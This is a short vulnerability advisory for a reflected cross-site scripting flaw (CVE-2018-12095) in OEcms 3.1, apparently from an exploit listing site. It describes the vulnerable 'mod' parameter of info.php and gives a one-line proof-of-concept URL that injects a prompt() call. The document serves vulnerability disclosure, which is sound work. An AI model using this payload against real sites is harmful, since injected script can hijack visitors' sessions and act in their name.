# Title: OEcms 3.1 - Cross-Site Scripting # Author: Felipe "Renzi" Gabriel # Date: 2018-06-15 # Software: OEcms v3.1 # CVE: CVE-2018-12095 # Technical Details & Description: # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "OEcms v3.1" web-application. # The vulnerability is located in the 'mod' parameter of the`info.php` action GET method request. # PoC http://Target/cms/info.php?mod=list"</|\><plaintext/onmouseover=prompt(/XSS/)>
Credits and Partners
All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD
